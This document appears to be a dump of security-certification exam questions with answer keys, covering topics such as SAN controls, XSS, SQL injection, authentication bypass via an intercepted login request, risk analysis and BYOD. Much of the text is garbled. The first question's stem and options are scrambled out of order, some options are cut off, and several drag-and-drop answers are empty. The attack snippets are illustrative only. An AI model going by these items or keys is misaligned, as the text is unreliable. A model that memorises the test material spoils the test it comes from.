Sensitive details communicated in clear-text D. The host does not have a security mechanism to authenticate the incoming ODBC connection. Accept the risk in order to keep the system within the company's standard security configuration. In order to further secure the data.example. Vulnerable to malware file uploads F. Vulnerable to SQL injection C. . a nonstandard configuration would need to be implemented.1 200 OK { "newAccountDetails": [ { "cardNumber":"1234123412341234"} { "cardExpiry":"2020-12-31"} { "cardCVV":"909"} ]. A.com/badcontent/exploitme.exe"} ]. The information in the database is not sensitive. Which of the following actions should be taken by the security analyst? A. Vulnerable to XSS E. B.{ "creditAccount":"Credit Card Rewards account"} { "salesLeadRef":"www. "marketingCookieTracker":"JSESSIONID=000000001" "returnCode":"Account added successfully" } Which of the following are security weaknesses in this example? (Select TWO). and the application requires that the connection have read/write permissions. Missing input validation on some fields B. "customer": [ { "name":"Joe Citizen"} { "custRef":"3153151"} ] } The banking website responds with: HTTP/1. Explain the risks to the data owner and aid in the decision to accept the risk versus choosing a nonstandard solution. JSON/REST is not as secure as XML Correct Answer: AC Section: (none) Explanation Explanation/Reference: QUESTION 188 ODBC access to a database on a network-connected host is required. but was not readily accessible prior to the implementation of the ODBC connection.

C. Synchronous copy of data B. Commercially available software packages are not widespread and are only available in limited areas. Do not allow the connection to be made to avoid unnecessary risk and avoid deviating from the standard security configuration. Data de-duplication . Which of the following is the BEST description of why this is true? A. D. D. Secure the data despite the need to use a security control or solution that is not within company standards. Information concerning vulnerabilities is often kept internal to the company that developed the software. Information concerning vulnerabilities and viable attack patterns are never revealed by the developer to avoid lawsuits. This can introduce new security risks to the network. B. Commercially available software packages are typically well known and widely available. C. Commercially available software packages are well known and widely available. Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 189 A company decides to purchase commercially available software packages. Information concerning vulnerabilities and viable attack patterns are always shared within the Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 190 Which of the following represents important technical controls for securing a SAN storage infrastructure? (Select TWO). Information concerning vulnerabilities is often ignored by business managers. Commercially available software packages are often widely available. RAID configuration C. A.

which will be required to host official business and public access. Patch the web application E. Port scanning F. Which of the following would be the MOST effective at preventing the "post your comment" field from being exploited? A. and private industry to ensure the city provides due care in considering all project factors prior to building its new WAN? . but feels this project has an increased complexity as a result of the mixed business / public use and the critical infrastructure it will provide. Install HIDS on the server D. Storage pool space allocation E. Filter metacharacters C. LUN masking/mapping G. Which of the following should the project manager release to the public. The project manager has experience with enterprise IT projects. It is also anticipated that the city's emergency and first response communication systems will be required to operate across the same network. Update the blog page to HTTPS B. Perform client side input validation Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 192 A project manager working for a large city government is required to plan and build a WAN.D. resulting in cross-site scripting attacks against customers reading the blog. academia. Port mapping Correct Answer: FG Section: (none) Explanation Explanation/Reference: QUESTION 191 It has come to the IT administrator's attention that the "post your comment" field on the company blog page has been exploited.

A. RFP D.org Content-type: text/html txtUsername=ann&txtPassword=ann&alreadyLoggedIn=false&submit=true Which of the following should Ann perform to test whether the website is susceptible to a simple authentication bypass? A. Remove all of the post data and change the request to /login. Remove the txtPassword post data and change alreadyLoggedIn from false to true D.1 Host: comptia. FCoE D. RFQ Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 193 An administrator is implementing a new network-based storage device. the administrator would like the data in transit's integrity to be the most important concern. Remove the txtUsername and txtPassword post data and toggle submit from true to false Correct Answer: C Section: (none) Explanation Explanation/Reference: . SMB B. NDA B. Which of the following protocols meets these needs by implementing either AES. iSCSI Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 194 Ann is testing the robustness of a marketing website through an intercepting proxy.aspx from POST to GET B. NFS C. In selecting a storage protocol. RFI C.CMAC or HMAC-SHA256 to sign data? A. She has intercepted the following HTTP request: POST /login.aspx HTTP/1. Attempt to brute force all usernames and passwords using a password cracker C.

XSS H. Log 1 B. String query = "Select user_id FROM user_data WHERE user_name = ` " + oe. Buffer overflow F. ACL G. Logs: Log 1: Feb 5 23:55:37.81 3 packets Log 2: HTTP://www.getParameter("userID") ) + " ` and user_password = ` " + oe.224 detected an error in the protocol stream and has disconnected the client Log 4: Encoder oe = new OracleEncoder ().2. Log 2 C.743: %SEC-6-IPACCESSLOGS: list 10 denied 10.com/index.encode ( req.getParameter("pwd") ) +" ` ". Each log below was collected from various security devices compiled from a report through the company's security information and event management server.QUESTION 195 A security manager looked at various logs while investigating a recent security breach in the data center from an external source. Log 4 E. Log 3 D.company.php?user=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Log 3: Security Error Alert Event ID 50: The RDP protocol component X.encode ( req.5. A. SQL injection Correct Answer: BE Section: (none) Explanation Explanation/Reference: QUESTION 196 A firm's Chief Executive Officer (CEO) is concerned that IT staff lacks the knowledge to identify complex vulnerabilities that may exist in a payment system being internally . Vulnerabilities Buffer overflow SQL injection ACL XSS Which of the following logs and vulnerabilities would MOST likely be related to the security breach? (Select TWO).

Modify the network diagram to prevent SQL injections. .000 11. If you place an object on the network diagram.000 USD.000 3. Packet Analyzer . viruses and ping attacks. you can remove it by clicking the (x) in the upper right-hand of the object. Which of the following would provide the MOST thorough testing and satisfy the CEO's requirements? A. C. Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 197 DRAG DROP Company A has experienced external attacks on their network and wants to minimize the attacks from reoccurring. XSS attacks.$20. Sign a MOU with a marketing firm to preserve the company reputation and use in-house resources for random testing.000 2.000 10. and performance.000 5. The payment system being developed will be sold to a number of organizations and is in direct competition with another leading product.000 4. The company can spend a MAXIMUM of $50. NIDS/NIPS-$10.000 8. stability. Web Application Firewall . Traffic Shaper . downloaded malware. D. Use the most qualified and senior developers on the project to perform a variety of White box testing and code reviews.$5. Spam Filter-$5. Proxy Server-$20.$10. smurf attacks. e-mail spam.$10.000 7.000 6. Router-$10. Firewall-$15. Patch Server-$15. Sign a NDA with a large security consulting firm and use the firm to perform Grey box testing and address all findings.000 Instructions: Not all placeholders in the diagram need to be filled and items can only be used once.developed.000 9. The CEO highlighted that code base confidentiality is of critical importance to allow the company to exceed the competition in terms of the product's reliability. A cost list for each item is listed below: 1. Sign a BPA with a small software consulting firm and use the firm to perform Black box testing and address all findings. B. Anti-Virus Server . Load Balanced Server .$10.

.

D.A. B. C. Correct Answer: Section: (none) Explanation Explanation/Reference: .

.

some staff within the security team have contended that Agile development is not secure. C. Use AES in Counter mode Correct Answer: Section: (none) Explanation Explanation/Reference: QUESTION 199 An internal development team has migrated away from Waterfall development to use Agile development. However.front design and inability to perform security reviews. Use RC4 in Cipher Block Chaining mode C. Use RC4 with Fixed IV generation B.QUESTION 198 A security administrator has been asked to select a cryptographic algorithm to meet the criteria of a new application. Overall. A. Which of the following is the MOST accurate statement? A. B. The application utilizes streaming video that can be viewed both on computers and mobile devices. The application designers have asked that the algorithm support the transport encryption with the lowest possible performance overhead. D. Use AES in Electronic Codebook mode B. Agile and Waterfall approaches have the same effective level of security posture. Agile development is fundamentally less secure than Waterfall due to the lack of formal up. Use RC4 with a nonce generated IV F. Which of the following recommendations would BEST meet the needs of the application designers? (Select TWO). Correct Answer: D Section: (none) Explanation Explanation/Reference: . They both need similar amounts of security effort at the same phases of development. Agile development has different phases and timings compared to Waterfall. this has been viewed as a successful initiative by the stakeholders as it has improved time-to-market. Security activities need to be adapted and performed within relevant Agile phases. Use AES with cipher text padding E. Agile development is more secure than Waterfall as it is a more modern methodology which has the advantage of having been able to incorporate security best practices of recent years.

End users have the ability to access internal web applications. Currently. Meet the two key VPs and request a signature on the original assessment. There are requirements to segregate development and test infrastructure from production and the need to support multiple entry points into the network depending on the service being accessed.QUESTION 200 An information security assessor for an organization finished an assessment that identified critical issues with the human resource new employee management software application. Craft an RFP to begin finding a new human resource application. drag and drop the appropriate network zone that the user would be accessing and the access mechanism to meet the above criteria. the following access requirements have been identified: 1. B. There are also strict rules in place to only permit user access from within the same zone. . In order to meet segregation and access requirements. Schedule a meeting with key human resource application stakeholders. C. Options may be used once or not at all. Developers have the ability to perform technical validation of development applications. All placeholders must be filled. B. Correct Answer: Section: (none) Explanation Explanation/Reference: QUESTION 201 DRAG DROP A manufacturer is planning to build a segregated network. Include specific case studies from other organizations in an updated report. Third-party vendors have the ability to support applications. The assessor submitted the report to senior management but nothing has happened. 2. 3. Which of the following would be a logical next step? A.

.

A. C. Correct Answer: Section: (none) Explanation Explanation/Reference: . D. B.

.

printf("Welcome to: %s\n". Determine if the information security standards have been complied with by the project Correct Answer: BE Section: (none) Explanation . Perform access control testing to ensure that privileges have been configured correctly E.Memory allocated but not freed: char *myBuffer = malloc(BUFFER_SIZE).QUESTION 202 The following has been discovered in an internally developed application: Error . Penetration testing F. Perform a security risk assessment with recommended solutions to close off high-rated risks C. if (myBuffer != NULL) { *myBuffer = STRING_WELCOME_MESSAGE. } exit(0). Secure code review of the HR solution to identify security gaps that could be exploited D. A. Black box testing Correct Answer: AC Section: (none) Explanation Explanation/Reference: QUESTION 203 A security architect has been engaged during the implementation stage of the SDLC to review a new HR software installation for security gaps. myBuffer). Memory dumping C. Perform penetration testing over the HR solution to identify technical vulnerabilities B. With the project under a tight schedule to meet market commitments on project delivery. which of the following security activities should be prioritized by the security architect? (Select TWO). A. Which of the following security assessment methods are likely to reveal this security weakness? (Select TWO). Static code analysis B. Manual code review D. Application sandboxing E.

B. Which of the following should be done to solve this? A. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 205 A security administrator was recently hired in a start-up company to represent the interest of security and to assist the network team in improving security in the company. The security engineers and application developers are falling behind schedule. Allow the application developers to attend a sales conference so they understand how business is done. Allow the sales staff to shadow the developers and engineers to see how their sales impact the deliverables. application developers. At the end of the project C. Which of the following is the BEST time to make them address security issues in the project? A. and sales staff. At the inception of the project D. C. The programmers are not on good terms with the security team and do not want to be distracted with security issues while they are working on a major project. The sales staff tends to overpromise the application deliverables.Explanation/Reference: QUESTION 204 A company has a difficult time communicating between the security engineers. Allow the security engineering team to do application development so they understand why it takes so long. At the time they request Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 206 . In the middle of the project B. Allow the sales staff to learn application programming and security engineering so they understand the whole lifecycle. D.

C. The system administrator cannot make updates to certain system files and services. The company would like to protect confidential information. they are denied and a system error is generated. causing a costly downtime on the company's primary website. The web server was not multipathed. D. it has been decided that when an employee leaves. Which of the following troubleshooting steps should the security administrator suggest? A. Disable any firewall software before making changes Correct Answer: A Section: (none) Explanation Explanation/Reference: . Reset root permissions on systemd files C. The distribution is configured to be "secure out of the box". Require cloud storage on corporate servers and disable access upon termination B. Each time changes are attempted. Which of the following is the MOST likely cause of the downtime? A. Review settings in the SELinux configuration files B. Which of the following would MOST likely help the company maintain security when employees leave? A. The SAN replication to the backup site failed.A port in a fibre channel switch failed. Whitelist access to only non-confidential information C. The SAN snapshots were not up-to-date. Perform all administrative actions while logged in as root D. the company will not completely wipe the personal device. Require that devices not have local storage Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 208 A system administrator has just installed a new Linux distribution. B. Utilize an MDM solution with containerization D. However. Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 207 A company has adopted a BYOD program. The web server iSCSI initiator was down.

Insider threat B. and static code analysis D. Which of the following could the company view as a downside of using presence technology? A. Industrial espionage Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 210 A security services company is scoping a proposal with a client. They want to perform a general security audit of their environment within a two week period and consequently have the following requirements: Requirement 1 Ensure their server infrastructure operating systems are at their latest patch levels Requirement 2 Test the behavior between the application and database Requirement 3 Ensure that customer data can not be exfiltrated Which of the following is the BEST solution to meet the above requirements? A. perform social engineering and run a vulnerability scanner B. Conduct network analysis. Physical security D. dynamic code analysis. penetration test and run a vulnerability scanner C. the company is concerned about the safety of employees and their families when moving in and out of certain countries.QUESTION 209 A multi-national company has a highly mobile workforce and minimal IT infrastructure. Run a protocol analyzer perform static code analysis and vulnerability assessment Correct Answer: B Section: (none) Explanation . As a result of the dispersed employees and frequent international travel. Network reconnaissance C. The company utilizes a BYOD and social media policy to integrate presence technology into global collaboration tools by individuals and teams. Penetration test. Perform dynamic code analysis.

Perform reconciliation of all payroll transactions on a daily basis Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 212 A company with 2000 workstations is considering purchasing a HIPS to minimize the impact of a system compromise from malware. Implement an application layer firewall to protect the payroll system interface C. the company projects a total cost of $50.000 one-time fee. The first quote requires a $10. The second quote requires a $15. and a 15% annual fee based on the number of workstations. Currently. Which of the following compensating controls should be used to mitigate the vulnerability of missing OS patches on this system? A. and a 10% annual support fee based on the number of workstations. it appears that the system is not being patched at all. The third quote has no one-time fee. Isolate the system on a secure network to limit its contact with other systems B. Third quote D. The Information Security Officer (ISO) has received three quotes from different companies that provide HIPS.Explanation/Reference: QUESTION 211 A critical system audit shows that the payroll system is not meeting security policy due to missing OS security patches.000 one-time fee. Monitor the system's security log for unauthorized access to the payroll application D. The vendor states that the system is only supported on the current OS patch level. Second quote C. an annual cost of $5 per workstation. annual cost of $6 per workstation. and a 12% annual fee based on the number of workstations. First quote B. Accept the risk Correct Answer: B Section: (none) Explanation .000 for the next three years responding to and eradicating workstation malware. an annual cost of $8 per workstation. Which solution should the company select if the contract is only valid for three years? A. Upon further review.

and 1 full time employee to respond to incidents per year. having an outsourced solution appears cheaper. having a purchased product solution appears cheaper. storage and management consoles expected to be $150.Explanation/Reference: QUESTION 213 A Chief Information Security Officer (CISO) has requested that a SIEM solution be implemented. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 214 A company has noticed recently that its corporate information has ended up on an online forum.000.5 full time employee (FTE) to manage the solution. Based on cost alone. Which of the following are the MOST effective security controls that can be implemented to stop the above problem? (Select TWO). Implement DLP on the desktop. B. Implement a URL filter to block the online forum B. Vendor B: managed service-based solution which can be the outsourcer for the pharmaceutical company's needs.000 per year per FTE. C. A. Security awareness compliance training for all employees D. Operational expenses are expected to be a 0.000 per year. both outsourced an in-sourced solutions appear to be the same. and web proxies E. which of the following options is MOST accurate? A. Based on cost alone. correlators. Capital expenses to cover central log collectors. Two vendor proposals have been received: Vendor A: product-based solution which can be purchased by the pharmaceutical company. having an outsourced solution appears to be more expensive. An investigation has identified that internal employees are sharing confidential corporate information on a daily basis. D. email gateway. Bundled offering expected to be $100. Implement NIDS on the desktop and DMZ networks C. The CISO wants to know upfront what the projected TCO would be before looking further into this concern. Based on cost alone.5 FTE per year. Review of security policies and procedures Correct Answer: CD . Internal employee costs are averaged to be $80. Based on cost alone. Based on calculating TCO of the two vendor proposals over a 5 year period. Operational expenses for the pharmaceutical company to partner with the vendor are expected to be a 0.

Section: (none) Explanation Explanation/Reference: QUESTION 215 The network administrator at an enterprise reported a large data leak. Configure the server logs to collect unusual activity including failed logins and restarted services. . D. Review the flow data against each server's baseline communications profile. Options may be used once or not at all. Which of the following BEST provides insight into where the compromised server collected the information? A. Upon investigation. B. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 216 DRAG DROP IT staff within a company often conduct remote desktop sharing sessions with vendors to troubleshoot vendor product-related issues. there have been no user logins over the previous week and the endpoint protection software is not reporting any issues. Setup a packet capture on the firewall to collect all of the server communications. C. Drag and drop the following security controls to match the associated security concern. One compromised server was used to aggregate data from several critical application servers and send it out to the Internet using HTTPS. Correlate data loss prevention logs for anomalous communications from the server.

.

B. C. Correct Answer: Section: (none) Explanation Explanation/Reference: .A. D.

.

Vendors were authenticating directly to the retailer's AD servers. Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 218 ABC Corporation uses multiple security zones to protect systems and information. C. but the smaller company's main applications were created in-house. A regression test should be performed on the in-house software to determine security risks associated with the software. Maintain a separate virtual switch for each security zone and ensure VM hosts bind to only the correct virtual NIC(s). D. The firewall rule was needed for an internal application that was developed. The smaller company has been very profitable. Each zone has different VM administrators. An ROI calculation should be performed to determine which company's application should be used. D. Ensure hypervisor layer firewalling between all VM hosts regardless of security zone. and an improper firewall rule allowed pivoting from the AD server to the DMZ where credit card servers were kept. Which of the following restricts different zone administrators from directly accessing the console of a VM host from another zone? A. The retailer determined that because the vendors were . C. A security assessment should be performed to establish the risks of integration or co. which presents risk. B. Organize VM hosts into containers based on security zone and restrict access using an ACL.existence. B.QUESTION 217 A large company is preparing to merge with a smaller company. and all of the VM hosts are part of a consolidated VM infrastructure. A review of the mitigations implemented from the most recent audit findings of the smaller company should be performed. Require multi-factor authentication when accessing the console at the physical VM host. The retailer had gone through an audit and had been presented with a potential problem on their network. Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 219 A well-known retailer has experienced a massive credit card breach. Which of the following actions should the large company's security administrator take in preparation for the merger? A.

Which of the following is a technical control that the security administrator should implement next to reduce malware infection? . To prove to the retailer the monetary value of this risk. Quantitative Risk Analysis D.required to have site to site VPN's no other security action was taken. Initiate a core dump of the application E. Use fuzzing techniques to examine application inputs B. Run nmap to attach to application memory C. Qualitative Risk Analysis Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 220 A security administrator is assessing a new application. The application uses an API that is supposed to encrypt text strings that are stored in memory. the company implements technical measures to disable external storage. A cost/benefit analysis C. How might the administrator test that the strings are indeed encrypted in memory? A. which of the following type of calculations is needed? A. Additionally. Use a packet analyzer to inspect the strings D. Use an HTTP interceptor to capture the text strings Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 221 A security administrator has noticed that an increased number of employees' workstations are becoming infected with malware. which blocks access to malicious web sites where malware files can be downloaded. Residual Risk calculation B. The company deploys an enterprise antivirus system as well as a web content filter.

A full-disk hardware-based encryption product with a low-level boot protection and authentication D. B. A partition-based software encryption product with a low-level boot protection and authentication B. The security administrator at the company has uncovered a breach in data confidentiality. C.000 end points. Deploy a network access control system with a persistent agent. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 222 A company that must comply with regulations is searching for a laptop encryption product to use for its 40. Company B is not in the same industry as company A and the two are not competitors. D. A file-based encryption product using profiles to target areas on the file system to encrypt Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 223 A company provides on-demand cloud computing resources for a sensitive project. Block cloud-based storage software on the company network. A container-based encryption product that allows the end users to select which files to encrypt C.A. The product must meet regulations but also be flexible enough to minimize overhead and support in regards to password resets and lockouts. Which of the following has MOST likely occurred? . Sensitive data from customer A was found on a hidden directory within the VM of company B. Which of the following implementations would BEST meet the needs? A. Implement an Acceptable Use Policy which addresses malware downloads.factor authentication for customer access to the administrative website. The company implements a fully virtualized datacenter and terminal server access with two. Enforce mandatory security awareness training for all employees and contractors.

Which of the following implementations addresses the distributed login with centralized authentication and has wide compatibility among SaaS vendors? A. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 224 After the install process. Both VMs were left unsecured and an attacker was able to exploit network vulnerabilities to access each and move the data. After the restore. An employee with administrative access to the virtual guests was able to dump the guest memory onto a mapped disk. a software application executed an online activation process. A stolen two factor token was used to move data from one virtual guest to another host on the same network segment. password replication and shared accounts are not acceptable. Install a read-only Active Directory server in the corporate DMZ for federation. the specialized application no longer works. Establish a cloud-based authentication service that supports SAML. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 225 Company XYZ finds itself using more cloud-based business tools. D. Security is important to the company. Correct Answer: A Section: (none) Explanation Explanation/Reference: . D. The application is unable to perform remote attestation due to blocked ports. After a few months. The hash key summary of hardware and installed software no longer match. A hypervisor server was left un-patched and an attacker was able to use a resource exhaustion attack to gain unauthorized access. The binary files used by the application have been modified by malware. Which of the following is the MOST likely cause of the problem? A. as a result. and password management is becoming onerous. Implement a new Diameter authentication server with read-only attestation.A. C. Allow external connections to the existing corporate RADIUS server. B. A backup image of the system was restored on a newer revision of the same brand and model device. The restored image backup was encrypted with the wrong key. D. B. B. C. the system experienced a hardware failure. C.

Increased customer data confidentiality C. Latency Correct Answer: A Section: (none) Explanation Explanation/Reference: . Increased customer data availability B. Increased security through data integrity Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 227 Due to cost and implementation time pressures. high volume database application that required a high degree of data confidentiality and data availability? (Select THREE). Both hosts will be connected to a shared iSCSI storage solution. Which of the following is the hosting company MOST likely trying to achieve? A. The new host hardware and operating system will be different from the first host.QUESTION 226 A small company hosting multiple virtualized client servers on a single host is considering adding a new host to create a cluster. A. Multipath B. Increased security through provisioning D. Zoning and LUN security C. Block level transfer of data D. File level encryption D. but the underlying virtualization technology will be compatible. a security architect has allowed a NAS to be used instead of a SAN for a non-critical. Which of the following would make a NAS unsuitable for a business critical. Broadcast storms C. low volume database. File level transfer of data B.

QUESTION 228 A small customer focused bank with implemented least privilege principles. Human Resources C. Which of the following BEST addresses the security and risk team's concerns? A. Which of the following should the auditor recommend FIRST? . Database Administrator.xyz. After installing the certificate on dev1. is concerned about the possibility of branch staff unintentionally aiding fraud in their day to day interactions with customers. Which of the following business roles would be MOST effective on this team? A. Finance Officer. one of the developers reports misplacing the USB thumb- drive where the SSL certificate was stored. Information disclosure policy B. The auditor also notices that many of the internal development servers use the same certificate. Physical Security Manager Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 230 After connecting to a secure payment server at https://pay. Programmers B. Human Resources. Job rotation D.com. Network Administrator. Network Administrator. an auditor notices that the SSL certificate was issued to *.xyz. Facilities Manager.com. Bank staff has been encouraged to build friendships with customers to make the banking experience feel more personal.com. Awareness training C. Emergency Response Team. The security and risk team have decided that a policy needs to be implemented across all branches to address the risk.xyz. Security Administrator D. Database Administrator. Separation of duties Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 229 A team is established to create a secure connection between software packages in order to list employee's remaining or unused benefits on their paycheck stubs.

C. The network administration team has conducted a thorough review of all network infrastructure and devices and found everything running at optimal performance.com. Which of the following should occur? A. Replace the SSL certificate on pay. Replace the SSL certificate on dev1. D. prosecutors in litigation with Company A suspect the CIO knew about the data breach long before it was discovered and have issued a subpoena requesting all the CIO's email from the last 12 months. Restore the CIO's email from an email server backup and provide the last 90 days from the date of the CIO resignation. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 232 A data processing server uses a Linux based file system to remotely mount physical disks on a shared SAN. D. These files are then accessed by a local Java program for processing before being transferred over the network to a SE Linux host for processing.com. A month later. Generate a new private key password for both servers. Inform the litigators that the CIOs information has been deleted as per corporate policy.xyz. Which of the following is the MOST likely cause of the processing problem? . Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 231 A data breach has occurred at Company A and as a result. Other SAN customers are unaffected. Generate a new public key on both servers. The data being processed consists of millions of small files being written to disk from a network source one file at a time. the Chief Information Officer (CIO) has resigned.A. C. The corporate retention policy recommends keeping data for no longer than 90 days. B. Restore the CIO's email from an email server backup and provide the last 90 days from the date of the subpoena request. B. Restore the CIO's email from an email server backup and provide whatever is available up to the last 12 months from the subpoena date.xyz. cell phone and PC were all wiped of data per company policy. The server administrator reports problems related to processing of files where the file appears to be incompletely written to the disk. The CIO's laptop.

The security administrator reviews the switch interfaces and does not see an excessive amount of network traffic on the voice network. C. Man in the middle attack. and often connect their work laptop to customer networks when onsite during meetings and presentations. Man in the middle attack. The administrator has a PERL script running which disrupts the NIC by restarting the CRON process every 65 seconds. Denial of Service. This increases the risk and likelihood of a security incident when the sales staff reconnects to the corporate LAN. The virtual file system on the SAN is experiencing a race condition between the reads and writes of network files. which of the following types of attacks is underway and how can it be remediated? A. The Java developers accounted for network latency only for the read portion of the processing and not the write process. The VoIP administrator cannot determine the issue. D. Using a protocol analyzer. D. use rate limiting to limit traffic. C. switch to more secure H. B. Based on the information given. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 234 Staff from the sales department have administrator rights to their corporate standard operating environment. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 233 The VoIP administrator starts receiving reports that users are having problems placing phone calls.1x to secure voice VLAN. Which of the following controls would BEST protect the corporate network? . Denial of Service. use 802. The Linux file system in use cannot write files as fast as they can be read by the Java program resulting in the errors. B.323 protocol. the security administrator does see an excessive number of SIP INVITE packets destined for the SIP proxy. and asks the security administrator for help. install an IPS in front of SIP proxy.A.

B. D. C.A. Provide sales staff with a separate laptop with no administrator access just for sales visits. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 235 DRAG DROP Drag and Drop the following information types on to the appropriate CIA category . Implement a network access control (NAC) solution that assesses the posture of the laptop before granting network access. Use an independent consulting firm to provide regular network vulnerability assessments and biannually qualitative risk assessments. Update the acceptable use policy and ensure sales staff read and acknowledge the policy.

A. B. C. D. Correct Answer: .

Section: (none) Explanation Explanation/Reference: .

and HIPS on the DMZ. The company has hired a security consultant to analyze the network infrastructure and provide a solution for intrusion prevention. . Switch to TLS in the DMZ.QUESTION 236 A financial company implements end-to-end encryption via SSL in the DMZ. Implement NIPS on the internal network. and only IPSec in transport mode with AH enabled and ESP disabled throughout the internal network. Which of the following recommendations should the consultant provide to the security administrator? A.

B. D. customized for the various departments and staff roles. Contact the computer science students and threaten disciplinary action if they continue their actions. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 237 A University uses a card transaction system that allows students to purchase goods using their student ID. Training and awareness of the new policies and procedures has been incorporated into the security awareness program which should be: A. Which of the following is the BEST course of action? A. Disable AH. presented by top level management to only data handling staff. Enable ESP on the internal network. C. and NIPS on the DMZ. C.B. . and use NIPS on both networks. Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 238 As part of the ongoing information security plan in a large software development company. Switch IPSec to tunnel mode. Notify the transaction system vendor of the security vulnerability that was discovered. Implement HIPS on the internal network. D. Students can put money on their ID at terminals throughout the campus. The administrator would like to attempt to reproduce what the students are doing. C. The security administrator was notified that computer science students have been using the network to illegally put money on their cards. B. Use a protocol analyzer to reverse engineer the transaction system's protocol. the Chief Information officer (CIO) has decided to review and update the company's privacy policies and procedures to reflect the changing business environment and business requirements. technical in nature to ensure all development staff understand the procedures. Enable ESP on the internal network. Install a NIDS in front of all the transaction system terminals. and place NIPS on both networks.

Only the DNS server is configured to audit user and administrator actions and logging is disabled on the other virtual machines. Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 240 A business wants to start using social media to promote the corporation and to ensure that customers have a good experience with their products. outdated versions of Apache. D. which of the following is the MOST significant risk to the system? A. The company must dedicate specific staff to act as social media representatives of the company. but it is encrypted when not in use. Server services have been virtualized and outsourced. A. Logging is disabled on critical servers. Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 239 Company XYZ has transferred all of the corporate servers. The finance department must provide a cost benefit analysis for social media. All servers are unpatched and running old versions. C. the corporate financial data is also hosted by the cloud services provider. All staff needs to be instructed in the proper use of social media in the work environment. used to promote the importance of the security department. All of the servers are running unpatched. The security policy needs to be reviewed to ensure that social media policy is properly implemented. E. D. Correct Answer: AE Section: (none) Explanation Explanation/Reference: QUESTION 241 . The company should ensure that the company has sufficient bandwidth to allow for social media traffic. Senior staff blogs should be ghost written by marketing professionals. including web servers. Given this scenario. Financial data is processed without being encrypted. F. C.D. B. Furthermore. Which of the following security items should the company have in place before implementation? (Select TWO). B. to a cloud hosting provider to reduce costs.

G. including screen lockout and mandatory PINs. Additionally. Buffer overflow B. XSS attack Correct Answer: D Section: (none) Explanation Explanation/Reference: . Correct Answer: BCF Section: (none) Explanation Explanation/Reference: QUESTION 242 A network administrator notices a security intrusion on the web server. Smartphones may be used as rogue access points. Equipment loss. C. The Information Security Officer (ISO) has received a technical document from the security administrator explaining that the current email system is capable of enforcing security policies to personal smartphones. theft. Click jacking C. E. Which of the following should the Information Security Officer be MOST concerned with based on this scenario? (Select THREE).php?op=modload&name=XForum&file=[hostilejavascript]&fid=2 in the log file? A. SQL injection D. Which of the following is noticed by http://test. B. The email system may become unavailable due to overload. D.A health service provider is considering the impact of allowing doctors and nurses access to the internal email system from their personal smartphones. Compliance may not be supported by all smartphones. and data leakage.com/modules. Smartphone radios can interfere with health equipment. Data usage cost could significantly increase. A. the system is able to remotely wipe a phone if reported lost or stolen. Not all smartphones natively support encryption. F.

Conduct a gap analysis and recommend appropriate non-technical mitigating controls. B. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 244 A security administrator wants to verify and improve the security of a business process which is tied to proven company workflow. Modify the company standard to account for higher security and meet with upper management for approval to implement the new standard. B. adapt the standard accordingly. and recommend appropriate mechanisms to increase overall security. transport encryption. The security administrator was able to improve security by applying controls that were defined by the newly released company security standard.QUESTION 243 A corporation has Research and Development (R&D) and IT support teams. Such controls included code improvement. D. Which of the following can the security administrator do to further increase security after having exhausted all the technical controls dictated by the company's security standard? A. and implement new technical controls. The corporation's Information Security Officer (ISO) is responsible for providing firewall services to both departments. Correct Answer: B Section: (none) Explanation Explanation/Reference: . Provide each department with a virtual firewall and assign administrative control to the physical firewall. and incorporate the new controls into the standard. Put both departments behind the firewall and assign administrative control for each department to the corporate firewall. Put both departments behind the firewall and incorporate restrictive controls on each department's network. C. C. Conduct a risk analysis on all current controls. but does not want to increase the hardware footprint within the datacenter. Provide each department with a virtual firewall and assign appropriate levels of management for the virtual device. Which of the following should the ISO consider to provide the independent functionality required by each department's IT teams? A. D. Modify the company policy to account for higher security. each requiring separate networks with independent control of their security boundaries to support department objectives. and interface restrictions.

